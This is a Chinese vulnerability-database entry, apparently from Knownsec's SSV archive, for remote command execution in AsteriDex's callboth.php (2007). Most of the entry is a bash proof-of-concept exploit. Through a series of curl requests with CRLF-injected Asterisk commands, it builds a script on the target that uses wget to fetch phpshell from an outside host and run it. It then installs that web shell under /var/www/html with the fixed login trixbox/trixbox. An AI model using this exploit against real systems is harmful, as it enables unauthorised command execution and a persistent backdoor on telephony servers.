AsteriDex CallBoth.PHP远程命令执行漏洞

基本字段

漏洞编号：: SSV-1980

披露/发现时间：: 未知

提交时间：: 2007-07-10

漏洞等级：

漏洞类别：: 嵌入恶意代码

影响组件：: (3.0)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.1KB

## ## Begin exploit ## #!/bin/bash echo Asteridex PoC Exploit (callboth.php vulnerability) echo By Carl Livitt / Hoku Security / June 2007 echo # This has to be (a) a valid SIP address, and (b) must answer when dialled. # The exploit will fail without these conditions being met. # Currently uses the Melonite SIP echo test service. SIP="190 (at) sip.melonite (dot) nu [email concealed]" # Magic number, don't change. The default installation of AsteriDex checks # for this number and fails without it. SEQ=654321 # Other stuff we need LOC=/asteridex/callboth.php OUT=123456 # Sanity if [ "$1X" == "X" ]; then echo Syntax: $0 \<Host IP\[:port\]\> echo For example: $0 www.example.com:8080 exit 1 fi # Insanity echo "[-] Exploiting host $1 - please wait" echo -n '[+]' Building shell script curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20\!/bin/sh>/tmp/t%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20%2dn%20wget%20%2dO%20x.tar.bz2%20%5c%27http://%3e%3e/tm p/t%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20%2dn%20prdownloads.sf.net/phpshell/%3e%3e/tmp/t%0d%0a" &>/dev/null echo . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20echo%20phpshell%2d2.1.tar.bz2%3fdownload%5c%27%3e%3e/tmp/t%0d% 0a" &>/dev/null echo '[+] Executing shell script' curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20/tmp;chmod%20%2bx%20t;./t;tar%20jxf%20x.tar.bz2%0d%0a" &>/dev/null echo -n '[+] Setting up phpshell' curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20cd%20/tmp;mv%20phpshell-2.1%20p%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20/tmp/p;echo%20%5c%5busers%5c%5d>config.php%0d%0a" &>/dev/null echo -n . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20cd%20/tmp/p;echo%20%27trixbox%3d%22trixbox%22%27>>config.php%0 d%0a" &>/dev/null echo . curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d% 0aData:%20mv%20/tmp/p%20/var/www/html/phpshell%0d%0a" &>/dev/null # Have a nice day echo "Done! You should now be able to browse to http://$1/phpshell/phpshell.php" echo You can login with the username \'trixbox\' and password \'trixbox\' ## ## End Exploit ##